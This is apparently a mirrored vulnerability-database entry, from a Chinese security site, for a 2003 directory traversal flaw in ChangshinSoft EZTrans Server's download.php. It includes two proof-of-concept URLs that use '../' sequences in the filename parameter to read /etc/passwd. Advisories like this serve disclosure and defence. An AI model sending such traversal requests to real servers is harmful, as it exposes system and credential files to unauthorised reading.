ChangshinSoft EZTrans Server – ‘download.php’ Directory Traversal

ChangshinSoft EZTrans Server – ‘download.php’ Directory Traversal

漏洞ID 1054021 漏洞类型
发布时间 2003-07-09 更新时间 2003-07-09
图片[1]-ChangshinSoft EZTrans Server – ‘download.php’ Directory Traversal-安全小百科CVE编号 N/A
图片[2]-ChangshinSoft EZTrans Server – ‘download.php’ Directory Traversal-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22886
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8155/info

It has been reported that a problem in ChangshinSoft ezTrans Server exists in the download.php script that may allow an attacker to view arbitrary files. This may result in the disclosure of potentially sensitive information.

http://www.example.com/question/crm/download.php?filename=../../../../../../../../../../../../etc/passwd

http://www.example.com/download.php?filename=../../../../../../../../../../../../../etc/passwd

相关推荐: Snowblind Web服务器服务拒绝漏洞

Snowblind Web服务器服务拒绝漏洞 漏洞ID 1107329 漏洞类型 缓冲区溢出 发布时间 2003-05-16 更新时间 2003-06-16 CVE编号 CVE-2003-0315 CNNVD-ID CNNVD-200306-080 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享